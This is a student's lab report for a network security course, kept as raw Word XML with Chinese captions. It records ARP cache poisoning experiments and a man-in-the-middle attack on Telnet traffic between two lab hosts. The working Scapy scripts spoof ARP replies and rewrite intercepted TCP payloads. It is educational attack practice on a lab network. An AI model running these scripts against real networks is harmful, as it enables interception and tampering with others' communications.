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第四次实验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57118216 丰思飏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="11169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865" cy="1991360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Task1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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接口为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>br-ad6f4ab01809</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="951230"/>
            <wp:effectExtent l="0" t="0" r="38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攻击前的arp信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="405765"/>
            <wp:effectExtent l="0" t="0" r="19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使用如下程序进行攻击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scapy.all import *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 = Ether()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ARP()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A.psrc = "10.9.0.5"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A.pdst = "10.9.0.6"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pkt = E/A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sendp(pkt)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攻击后的arp信息，已经实现了中间人攻击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9372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攻击后使用ip neigh flush  dev eth0 清空缓存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/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1.A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scapy.all import *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 = Ether()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ARP()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A.op = 1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A.psrc = "10.9.0.5"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A.pdst = "10.9.0.6"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pkt = E/A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sendp(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="9232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攻击成功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1.B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B的IP已经在A的缓存中时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攻击有效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#!/usr/bin/env python3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scapy.all import *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= Ether()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ARP()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A.op = 2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A.psrc = "10.9.0.5"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A.pdst = "10.9.0.6"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pkt = E/A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sendp(pkt)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230" cy="1125220"/>
            <wp:effectExtent l="0" t="0" r="127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B的IP不在A的缓存中时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55880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攻击失败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1.C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#!/usr/bin/env python3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scapy.all import *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= Ether()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ARP()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A.psrc = "10.9.0.5"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A.pdst = "10.9.0.5"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A.hwdst = "ff:ff:ff:ff:ff:ff"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E.dst = "ff:ff:ff:ff:ff:ff"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pkt = E/A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sendp(pkt)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B的IP已经在A的缓存中时攻击成功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762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B的IP不在A的缓存中时，攻击失败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753745"/>
            <wp:effectExtent l="0" t="0" r="889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Task2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Step2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完成欺骗后，没开启IP forwarding的情况下ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回应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721360"/>
            <wp:effectExtent l="0" t="0" r="63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Step3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启IP forwarding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580390"/>
            <wp:effectExtent l="0" t="0" r="1143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7325" cy="664845"/>
            <wp:effectExtent l="0" t="0" r="3175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建立Telnet连接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675" cy="1764665"/>
            <wp:effectExtent l="0" t="0" r="952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用以下程序进行攻击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scapy.all import *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IP_A = "10.9.0.5"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MAC_A = "02:42:0a:09:00:05"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IP_B = "10.9.0.6"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MAC_B = "02:42:0a:09:00:06"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spoof_pkt(pkt):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pkt[IP].src == IP_A and pkt[IP].dst == IP_B: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].payload)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del(newpkt[TCP].chksum)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if pkt[TCP].payload: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data = pkt[TCP].payload.load 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newdata = 'Z'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send(newpkt/newdata)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else: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send(newpkt)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elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].chksum)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send(newpkt)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 = "tcp and host 10.9.0.5"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pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)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攻击成功后，数据替换为Z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5420" cy="763270"/>
            <wp:effectExtent l="0" t="0" r="5080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Task3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用以下及程序进行攻击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!/usr/bin/env python3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scapy.all import *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IP_A = "10.9.0.5"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MAC_A = "02:42:0a:09:00:05"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IP_B = "10.9.0.6"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MAC_B = "02:42:0a:09:00:06"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spoof_pkt(pkt):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pkt[IP].src == IP_A and pkt[IP].dst == IP_B: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].payload)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del(newpkt[TCP].chksum)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 pkt[TCP].payload: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data = pkt[TCP].payload.load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newdata = 'aaaa'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send(newpkt/newdata)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else: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send(newpkt)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pkt[IP].src == IP_B and pkt[IP].dst == IP_A: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newpkt = IP(bytes(pkt[IP]))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del(newpkt.chksum)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del(newpkt[TCP].chksum)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send(newpkt)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= "tcp and host 10.9.0.5"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pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)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686300" cy="657225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200525" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="317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实现替换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5A13"/>
    <w:rsid w:val="0174113F"/>
    <w:rsid w:val="0B21523D"/>
    <w:rsid w:val="0C7F4199"/>
    <w:rsid w:val="0C9A66DF"/>
    <w:rsid w:val="0ED00DA9"/>
    <w:rsid w:val="13443F70"/>
    <w:rsid w:val="15492056"/>
    <w:rsid w:val="17EC041A"/>
    <w:rsid w:val="19212B06"/>
    <w:rsid w:val="203033AE"/>
    <w:rsid w:val="209D4B88"/>
    <w:rsid w:val="21144671"/>
    <w:rsid w:val="230C02EC"/>
    <w:rsid w:val="2B7F48A6"/>
    <w:rsid w:val="2C7372C2"/>
    <w:rsid w:val="2E174094"/>
    <w:rsid w:val="39312EA9"/>
    <w:rsid w:val="41616FB7"/>
    <w:rsid w:val="426E2388"/>
    <w:rsid w:val="49E67B0C"/>
    <w:rsid w:val="4D9A4130"/>
    <w:rsid w:val="512366EB"/>
    <w:rsid w:val="530465F4"/>
    <w:rsid w:val="53F74B1D"/>
    <w:rsid w:val="59921C4F"/>
    <w:rsid w:val="5D821C7D"/>
    <w:rsid w:val="60A270A0"/>
    <w:rsid w:val="65243DE8"/>
    <w:rsid w:val="65C34C39"/>
    <w:rsid w:val="66977E7B"/>
    <w:rsid w:val="699510AC"/>
    <w:rsid w:val="6ADD423C"/>
    <w:rsid w:val="6CFC3711"/>
    <w:rsid w:val="6DEF4FDE"/>
    <w:rsid w:val="6DF33B69"/>
    <w:rsid w:val="731D06D1"/>
    <w:rsid w:val="740647DC"/>
    <w:rsid w:val="79830AAD"/>
    <w:rsid w:val="7DE7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2021-07-15T00:42:09Z</dcterms:created>
  <dc:creator>dell</dc:creator>
  <cp:lastModifiedBy>丰思飏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-15T07:54:00Z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CB0FAC4696B14031A7354D3DCB473231</vt:lpwstr>
  </property>
</Properties>
</file>